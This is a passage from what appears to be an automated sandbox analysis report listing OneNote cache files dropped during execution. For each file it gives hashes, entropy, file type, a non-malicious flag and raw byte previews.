Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.].......]...e\.3.,......]...e\.3.,......]...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............`....Z..#$./.O......N...^................YcO.D...R!...........f........................................I.qk..B.....LZ............`....Z..#$./.O..........`....Z..#$./.O............].......].......]...........................................].j.....].T.]...].......]...B...].H.....]...B...]...>.).]...J...................;........4...4...4.."...............]...]...]...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........].......].....#.].............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.110381618440931
Encrypted:	false
SSDEEP:	96:FsWhtJnSzT2kEieIX7I9IpgTtRK8xt0+wQ6D:FsWhtJSzyxTIX7I9IpgpRK8xt0+wQ6
MD5:	068C3F89C557C328E19E701C92C719AC
SHA1:	6C526A92CEB2EFC58F8240C3F64D1BB047C4A949
SHA-256:	FBA5E8AC586C0DBCBE0F9FFDD7EE283B6C2DF08B8653E454C8CF08FCEA58C7E2
SHA-512:	059414F6FCC47A41A592AA380F8ECEA061A6F8A730EBCE13C6D1CCB05E7E08B1BE82EA0A8EE91893454ED591F26D8FC401A2B57EE59EB8D0ED2322C147446172
Malicious:	false
Preview:	2...>..........v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.............F.:....I......F.:....I......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............b+.'.d../...s.b....N...^................y...@O...Uy...........f........................................I.qk..B.....LZ............b+.'.d../...s.b........b+.'.d../...s.b........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.111042861738723
Encrypted:	false
SSDEEP:	48:hs5wPSI0gC5t6DpOEnpDCZPOXY92IxKEjcTo2CrdSrVIeDdXmuaH+1:hsfgC5kDEE1FXY92IxwTkRKjDl
MD5:	6619756788674191DD66105FDEBFCD69
SHA1:	5BFE57A2914A730DEE82D3801D14EE5A79589102
SHA-256:	8B81A058C4D5D3E7E67D5ACE2040107836F7A7ABAB74D23BC294D049C5EBB125
SHA-512:	CF77BD00F5652A45DB13CC68951B2AFFE98CE6022D87152012BC27D6A6AE53C09516A6069E23D14BDEBBFB62A786E4D5496EB7091C8783115DC3AA7D5C171FA7
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ3.......3...p...!L.(..U.3...p...!L.(..U.3....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............._N."..5.6.0.([......N...^..................;vknF..?..n.........f........................................I.qk..B.....LZ............_N."..5.6.0.([.........._N."..5.6.0.([...........3.......3.......3...........................................3..j....3..T.]..3.......3....B..3..H....3....B..3....>.)3....J...................;........4...4...4.."..............3...3...3....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........3.......3......#3..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.094079303613883
Encrypted:	false
SSDEEP:	48:CnxusYBZiJ07NtdGeEmCKJX89sP9beITotrdSr4IOdXC1xsxnknGxrU01:NsX0pBEm/X89YfTsRKgR
MD5:	533C2B06D627884237D58C90C86DD66C
SHA1:	534A777BA522A59196FC11B5510230F29462D41E
SHA-256:	B886C8088125E0EE3F59967DE0DF91CE30E38935BB3BA0691BA72DF9F5287AD5
SHA-512:	DC8E8EBF2D26595D0A9FD26D7E81BEF2AC78944EDA9C98F42B30CE6F5EDC32F8B1843D074D5366FB20EFC9A7C97DD0C289B9654BB8246AA60D79EAC0BE14996F
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................<.......<.{+.!.2W......I.......I.qk..B.....LZ.<.{+.!.2W......<...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............~xjd..h......y.{....N...^................x....A.,;.h.PV........f........................................I.qk..B.....LZ............~xjd..h......y.{........~xjd..h......y.{..........<.......<.......<...........................................<.j.....<.T.]...<.......<...B...<.H.....<...B...<...>.).<...J...................;........4...4...4.."...............<...<...<...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........<.......<.....#.<.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.122261301713409
Encrypted:	false
SSDEEP:	48:KSrJsOY5ajZbstqoElCC5WlXSl9WmmTourdSr9FmIkKdXp50QIHSeJ:KSrJs0jZbs1ElCZlXSl9fmTLRK/MKW
MD5:	8530FF1F44ABA8BC9471C97D90DD7468
SHA1:	A794560E52CF2FF7D600F2E385645EF52F7CE857
SHA-256:	20A7646AB95C045FE70A89551F307AE9E4AE504F96E4C843AE1967ABAFFAF4C3
SHA-512:	38486DCAF83DC832BBDE01A23CDC12822E425AEB2F987F8B84A12F736182304C69A848620361677A5E6AF9C9471527FA05DD00B524F2F865FFF81D7DCD4D65DE
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.........=t...1?.......=t...1?.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............n.V.E...?$\...c.....N...^...............!.....J.NQF..........f........................................I.qk..B.....LZ............n.V.E...?$\...c.........n.V.E...?$\...c.....................................................................j......T.].............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4......7...7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.0975833820262935
Encrypted:	false
SSDEEP:	96:K7csQrTpwtcn7RE6c7LIXPI9SGbTARKy2azy6TWe+Co3XyYeJ:Xso4c6DsXQ9bbkRKy2
MD5:	40B82CF733AC938800579742777EE4E4
SHA1:	667AD437906C34ACEF5BABD7F552438EE6F45E35
SHA-256:	7B54B940721F8EFD3EA9E0165A8F053174EB176ECC6055110287BA24563C7103
SHA-512:	9445D70CC637ED1820FDB2E037D2380B09A72ACE69FE5A9F2C2070FFBF8C1E5B188A3D419C8F9E8D7C3E5EE15DD7951F685BEE22BDEA5AC387737357988F1B6F
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.ku......ku.Z....=....u.ku.Z....=....u.ku..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............H........O..pb....N...^................-lj..i@....M..........f........................................I.qk..B.....LZ.............H........O..pb.........H........O..pb..........ku......ku......ku..........................................kuj.....kuT.]...ku......ku..B...kuH.....ku..B...ku..>.).ku..J...................;........4...4...4.."...............ku..ku..ku..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........ku......ku....#.ku............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.094287737141189
Encrypted:	false
SSDEEP:	48:QHsvU8FDYU8NU87mbq2EtbKEIWCCYKXSd39rFK7To8rdSrKIJdXXiMrjU8NU8D8W:QHsnbq2E4EPBXSd39GTFRKtErE
MD5:	08A91E9B79A34682588AA257168C91F8
SHA1:	EB3524292936377C911B7ACF558DC3286F5E903C
SHA-256:	1748F28A2CF0C068DC83F615D3A766133C28B48F2CDF322D979738F54F2BD4BE
SHA-512:	BADA6FA928C76C210B125122B35AA3341341370D6DF665FF2BCFABD0212358EEDADD41D3790FC196225D53724F002CF1F04FFDB786C90EDDE2D718DF3D2C1885
Malicious:	false
Preview:	2...>...........v..."...................................................................................................................................2...>...........v...V............................I.......I.qk..B.....LZ...........9..../.>.q......9..../.>.q........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...................B.9}4...7{....N...^.................b..fdB..G..&.........f........................................I.qk..B.....LZ..................B.9}4...7{..............B.9}4...7{........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.120009214495203
Encrypted:	false
SSDEEP:	48:tsTBg49DqP1toSEVC/BXw9h55dGTofrdSreIUdXR4xemZel:tsHuP15EVsXw9ZMTKRKEjL
MD5:	FC097CC43306C5181664221BB247EFDF
SHA1:	413A5B3EAC130AC092F8B5A3422FA5DC729E98EF
SHA-256:	2F21CC3A98ACC9915A11949C2E2BB8E32063D1A30C34AE9371BC901C7A370D9B
SHA-512:	E1758FAB7618718564DEE223517E16DB9B44EA36AE3FADA1CCB97DCDD89C2127849AA5487253E24A6D657817CAA7D190449029B69B4EDFBB3B95AF800193BBFA
Malicious:	false
Preview:	2...>..........v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.i]......i]......)d0.....i]......)d0.....i]..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............:...4.........N...^................".j...H....v.c?........f........................................I.qk..B.....LZ..............:...4...............:...4...............i]......i]......i]..........................................i]j.....i]T.]...i]......i]..B...i]H.....i]..B...i]..>.).i]..J...................;........4...4...4.."...............i]..i]..i]..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........i]......i]....#.i]............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.126073068673499
Encrypted:	false
SSDEEP:	96:Fs7zoNZEsWM+XA9ET8RKr7wQIRstQC63:Fs7zow8+XA9EARKr7wQIStQn3
MD5:	5C89F6865F39D0DDA9FCAE63A76AF01F
SHA1:	3A3669A361D29D411F85E4ABD380E2EB7D120D03
SHA-256:	5FCB5E48E40129303045A67F67271AC9A850F01061F9D7FDE3A0301A51150FF3
SHA-512:	1184132A1DE01F9DE0B8C442799F356736EAAE43F20159ECB5DC31294FC7F14CB5225A0556802DD5CEC90D14064CCC9B416A7562D9AC22175BC2475C4CABDEFB
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ...........;ww..8b.........;ww..8b...........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................EPLU.+4%.........N...^..................c...F.....(.:........f........................................I.qk..B.....LZ...............EPLU.+4%................EPLU.+4%.............................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.13112589679243
Encrypted:	false
SSDEEP:	48:+Tusv5pKp4eP/4tcWER35uCAZ5WXtW9R1TTokrdSrSIAedXPl5ybCUWW5b8sF:+TusuieP/4xER3cKXA9RxT9RKkeGv
MD5:	89F8680CB9E0D6922A2902597EB5EA19
SHA1:	82BEDDE5B4C7F1DD558C1830448330DBC29F455C
SHA-256:	E4DEC192BEBA39F3C0FE506874E0F7897FEA7CFC40F79629AE08CB648AED8A51
SHA-512:	1D9636F9B93B6E534ECDF9E303A384562A2B74715E935CCC06648A05491F8C8B80906BBF61EB1EC7187894C017D07355667377AD080F8C8C4375CB1677FD75E9
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ..<.......<..!..<..!9....<..!..<..!9....<..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............O{l.........r....N...^................o..f?.O...^.,.........f........................................I.qk..B.....LZ..............O{l.........r..........O{l.........r...........<.......<.......<...........................................<j......<T.]....<.......<..B....<H......<..B....<..>.)..<..J...................;........4...4...4.."................<...<...<..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........<.......<....#..<............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.126879614443054
Encrypted:	false
SSDEEP:	48:j1s7iDABg0t1ieENAIWCp2hlXk9LX9TomrdSrsUIh1dXtwGkRvqhTnG9Hdz:j1sfBhXtENA1s2LXk9LtT7RKshOF
MD5:	5F46C4470612E5F8CCB0995263BF0783
SHA1:	B12A7A0B6B9CAC6891CCF52A03DF30759CB842C5
SHA-256:	4A5C90038FB0750D2FE4AF65B7D8AEDAEA4651241CD144A20D97359A0FF306F7
SHA-512:	0B9B5AA9D9CFF6FD8199C4C42061E646901BDA59F0AC45392C117236F95BDDC989F9E9285D8F4CDA7D5AF4C66048FA69A4115602EBCD0C8DD490A3476325B3A2
Malicious:	false
Preview:	2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ............O....bD........O....bD.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............(..<q.'P5.Z.G.....N...^..................m...I...M.\|.........f........................................I.qk..B.....LZ..............(..<q.'P5.Z.G...........(..<q.'P5.Z.G.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.121715061830216
Encrypted:	false
SSDEEP:	96:KwsHa6TxVXEyruX49TwTNRKADahVcT08:3sH7Tn0ySX49TwRRKADaHc
MD5:	73F7C039F98A5507E8C4ECBAA6B98FB6
SHA1:	B06452AC4F83F2B691085C60535192977CBAF07C
SHA-256:	5C98ABC3039990F7B35579D94EAE6492B67C333D6C93B4974A9D1DD73035676F
SHA-512:	3D1DA74A8EC0730FEDAF483B5C0E5591A956C75BAE46FE364A6C91C19ADE0B5BC26C562916B7CD50100AF2A4C2B5F6B74536E2D6FD2EBA5D9840DA5303587B9D
Malicious:	false
Preview:	2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.v.......v.]....0.o..S9S.v.]....0.o..S9S.v...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............}.......6..o.....N...^...............dk".pD...O.H'.........f........................................I.qk..B.....LZ.............}.......6..o..........}.......6*..o...........v.......v.......v...........................................v.j.....v.T.]...v.......v...B...v.H.....v...B...v...>.).v...J...................;........4...4...4.."...............v...v...v...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........v.......v.....#.v.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.152736379100425
Encrypted:	false
SSDEEP:	48:js1cCTbstKjJmIEJlCDwXHO9HI4W5ZTokrdSrvhIRdXPAmMv0xf:jsdTbs8dEXBXu9wZTZRKvQ+x0x
MD5:	07D2829EDAA46CC37DD945F945FD395D
SHA1:	2A5DE75F194342C66E7A96A5278C39D5CB1E026F
SHA-256:	629FAF9A5F7E672EF91A020B2653494D3BEE9654A511A05C6C36267365E59D5C
SHA-512:	0DB4BB474BAFB60198945E5DCC7572B5B428E803BA471F2F15E9221F56D1C6002C4A48C92A134758FAFC7047CD0D31A3FCE3BCDF7D324C5C8BF8030600FC541C
Malicious:	false
Preview:	2...>.......(...v.......................................................................................................................................2...>...........v...P............................I.......I.qk..B.....LZ=u......=u.....!....U..=u.....!....U..=u...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................#..T....nzJ......N...^.................{..oeC.....D........f........................................I.qk..B.....LZ...............#..T....nzJ.............#..T....nzJ...........=u......=u......=u..........................................=u.j....=u.T.]..=u......=u...B..=u.H....=u...B..=u...>.)=u...J...................;........4...4...4.."..............=u..=u..=u...z...y.. x.. ...........$........4......7...7........................;........4...4...4.........=u......=u.....#=u.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.61874393275688
Encrypted:	false
SSDEEP:	96:2OC399QkFfLCIRqsxej0EG4ILEZc4IrH4Iglb17I:2Oi9HFfnqLlOIZUrXgx
MD5:	3B63AC1993BA220796791FDF2CEE81BD
SHA1:	3F0917BFBE17CB9770DF86B23C188AE4CB888776
SHA-256:	938798214AD0FAD1C73C8620405EAF8F8EBE73827A9A03AECB76158CE29D219D
SHA-512:	2BB7992AB90F654D99C45570EDB585777A79B6703EA3BBC1E92CE958DA1D0B5BCEC606459E36DCC0C555EEE8BFE0A80D01829D740D9DA4AC3B6CB60D2B7E5A43
Malicious:	false
Preview:	....X....................................................................................................?..................................................X...............8........................................a.I..._..m"......m".&..H...A.....E...q.+....A3~.E.....%k@.....^........7...(...WD....7...........,.......,....................................................3.......3...v......gp.\......\..B....e..2.......^...........<.......,........m"...3...6..Z..7..,...........T.v...m"T......6T)....\T.2...Z.T)R..,....J..,...."..,....q.......m"..........c..,0...e...B4.$...........GP..A..}.....J................................&4..3.>.....,.......,..aR.-....t...\..B....e...\....kv.F..........m".&..H...A...6.m".....>...............7...(...WD.......&4..3.>.....m".&..H...A..............0...........e....4.............."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w.......B.^....F...r.QH.....(...........(..."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	4.62831608522093
Encrypted:	false
SSDEEP:	384:KP89/i9czKMYREYaRtX7vfx8QhdEAFWCjm7bO9S3KZoVvcnatpuKhN8CuI3BWjzJ:KP89/DzK9WYaR9vfx8QhdNFWCjmvO9SC
MD5:	3E3FB8E2D929549F1E05A235765CCD98
SHA1:	1A70AEF9AE017EE4EB06D1AC95F67147E1BCEF00
SHA-256:	05968358ACFD3CA902335DD4C1DEF380BB24CD1A3814FC1C96FEE5AF495BE79C
SHA-512:	82BB0DD148C39A5405BE658EDE0C40EF76EFC18E27B001409C2E3E3345DEF57B8F5646C60A05085C4FF1C404E224F29D73F2322DF870B2EFCC833CFA1A4E88E1
Malicious:	false
Preview:	....>...........v........@..X ...I..........>...T.......v.......PH..X ...H..................................................................................>...`.......v........H..X ...I...............I.......I.qk..B.....LZ.Z.......Z..s.`.......c..Z..s.`.......c..Z....x.....7.../..x..I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'....................5..'a.7....N...^................Hp..p.A...`o...................................................I.qk..B.....LZ...................5..'a.7..................................Z.......Z.......Z............................................x(.W....x(._....x ......x$......x ......x$......x ..."..x(.~...............;........4...4...4............'.Z.D.Z...z...,4. .......$>........4....7........................Z.3.Z..Z..Z..Z..Z..Z...z...y.. x.. ........ ..$...$........&..$!..7!..7............o.e.L.o.c.I.D...o.e.L.o.c

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.023311142402653
Encrypted:	false
SSDEEP:	96:ZasQdWE5Ch9/kn3/kQeuyLgkL+HA6lEXylCTR/yQydyt4:ksQp5Ch9Mn3MQeH3aHA6lEXQCTR/yA
MD5:	E6B1938A1EAC1BA7B71874B1DEEBB8A2
SHA1:	8A40E7066E485A069C9A86E9DDEADC9F796B34C7
SHA-256:	FDA0946F3F99B5CEB1EF0AE47D0A42D55C57A973971A9DEE1BD3F9C2A8F84B74
SHA-512:	E2A59E6C060DD777066B227FD1DA8F9AFA01B94BA68AE862624D3163ED4D8C1D11EEC0498B0C17C48175E4CE7571A32DE49B3411A21EB48A2A3C88B43665E104
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......j...v...6............................I.......I.qk..B.....LZ..".)....."'".q.&..1.\|L.."'".q.&..1.\|L.."..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3/B.......MK_..>....N...^...............4.a...A.`...AK............@&....................................I.qk..B.....LZ............3/B.......MK_..>........3/B.......MK_..>..........."......."......."..........................................."j......"T)Z...."..2...."......."H......"..J.$.."$.z.%.."..0...............;........4...4...4..............z...........................;...!..7......................C.a.l.i.b.r.i.................z.......R...................!..7............S.y.m.b.o.l...................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.515175365192018
Encrypted:	false
SSDEEP:	192:/s3T4cJ05kO19le7pm9wh3Vg9WIr6Ql1NY3PhLXlZBzYiKRtAbffQ7Mat1jT:0jO19l2Wwh3i/v43Phj/BfKRtq+h
MD5:	CFD3185442CA7ADFF0CDA3A2BBAF28ED
SHA1:	FAE36A5B344E217721078F85DAAC3C80EEA0B9A2
SHA-256:	A44FC5C63F684DDF226449C52559113E4F4B40C8F8AC4AFC3D3FBA2551AE1E14
SHA-512:	729F249B06F7808EBC27FA9CEB0599A16502F9366718F34934B432E8DC2616BE3F5FE38E6612B0D71FDFAAAB1921601DB028DFEE1C751A11A53C882265CBEAC4
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......0...v................................I.......I.qk..B.....LZ.&\.9....&\....<..l$[r..&\....<..l$[r..&\..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................w{....L.......N...^...............jxD.\..D....%v........."...4...............................b....I.qk..B.....LZ.................w{....L................w{....L.............&\......&\......&\..........................................&\j.....&\T.x...&\......&\..4...&\H.....&\ .....&\$.....&\..j...............;........4...4...4..............&\:.&\j.&\..z...y.. x.. ...........$........!..7!..7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0............&\:.&\L.&\..z...y.. x.. ...........$........!..7!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.237140097936214
Encrypted:	false
